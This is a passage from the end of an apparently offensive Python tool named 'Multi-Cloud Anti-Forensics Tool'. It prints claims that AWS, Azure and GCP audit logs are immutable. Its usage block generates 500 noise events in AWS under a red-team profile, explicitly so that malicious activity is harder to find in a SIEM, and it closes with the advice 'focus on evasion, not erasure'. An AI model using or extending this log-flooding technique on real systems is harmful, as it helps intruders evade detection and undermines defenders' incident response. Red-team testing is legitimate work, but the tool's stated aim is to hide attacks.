            # AWS: Modify S3 object timestamps via copy
            s3 = self.aws_session.client('s3')
            
            try:
                # Example: Backdate object by copying with modified metadata
                # Note: This doesn't change CloudTrail logs, only object metadata
                print("[!] AWS object timestamps can be modified via metadata")
                print("[!] However, CloudTrail logs are immutable")
            except Exception as e:
                print(f"[-] Timestamp manipulation failed: {e}")
        
        elif cloud_provider == 'azure':
            print("[!] Azure Activity Logs are immutable")
            print("[!] Timestamp manipulation not possible")
        
        elif cloud_provider == 'gcp':
            print("[!] GCP Cloud Audit Logs are immutable")
            print("[!] Timestamp manipulation not possible")

# Usage example (AUTHORIZED TESTING ONLY)
if __name__ == "__main__":
    print("[*] Multi-Cloud Anti-Forensics Tool")
    print("[!] USE FOR AUTHORIZED TESTING ONLY")
    print("")
    
    af = MultiCloudAntiForensics()
    
    # Generate noise to obscure malicious activity
    # This makes finding specific malicious events harder in SIEM
    
    # AWS noise
    af.setup_aws(profile='red-team')
    af.create_noise_aws(num_events=500)
    
    # Azure noise
    # af.setup_azure()
    # af.create_noise_azure(subscription_id='sub-id', num_events=500)
    
    # GCP noise
    # af.setup_gcp(project_id='project-id')
    # af.create_noise_gcp(project_id='project-id', num_events=500)
    
    print("[*] Anti-forensics operations complete")
    print("[!] Remember: Logs are immutable in cloud environments")
    print("[!] Focus on evasion, not erasure")